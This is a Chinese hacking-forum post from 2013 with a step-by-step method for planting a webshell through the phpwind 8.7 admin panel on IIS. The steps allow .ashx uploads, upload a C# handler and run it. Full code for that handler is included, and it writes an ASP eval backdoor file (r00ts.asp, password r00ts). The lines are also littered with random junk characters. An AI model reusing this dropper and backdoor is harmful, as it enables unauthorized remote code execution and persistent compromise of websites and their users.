找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1964|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小, I/ |1 C& Z; k5 f, E

* s% A) G9 s$ L; o群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx$ n; N/ a& Q. {

7 p: f4 u$ n- A/ A% z发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
! g& v( f/ {9 T2 v# u' _) f( N* O
( ~* x) A. R$ e: t然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
# y( k# u1 M" ]( K1 J. S9 y 7 l  V! Z( m# ~+ v* O) V
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
, j8 L/ d4 _9 v/ x$ f: t. _
6 f2 z) C% F7 y下面是代码:
' G, H' T- d& Z' Z5 j4 C/ h$ ?
2 Y0 r7 g9 A+ M<%@ WebHandler Language="C#"Class="Handler" %>/ q( e/ f) O" m+ H
using System;0 O/ G: e, `- @* K8 `) `( s6 x
using System.Web;& P- g# b% p" m. N
using System.IO;
% ^5 Z1 f! |4 H/ M6 p4 l3 z9 jpublic class Handler : IHttpHandler {
' M4 r" \# Y( u* `public void ProcessRequest (HttpContext context) {. }  |4 z0 `  G6 l8 V) w
context.Response.ContentType = "text/plain";; G: e: ?6 Z- x! k( k8 |
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
8 r( H9 g: f2 w2 P0 Xfile1.Write("<%eval request(\"r00ts\")%>");
) R% f$ ?( V4 V. ifile1.Flush();
$ [# V. V& n/ I* cfile1.Close();
! g! G; E& ?; r, B" M}& D( U, Z) p# ]0 E% x
public bool IsReusable {; H5 X" S2 k( f  {2 L0 v
get {
2 R3 c. v3 N2 v; n- r* Oreturn false;
8 V% V$ c$ K2 p7 Q) z3 m% ]+ G}
7 `* F% M$ N* f6 N7 y}
! Y- N* I# X! j* ^}
$ J9 K5 k5 l6 S; ^" `7 {
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表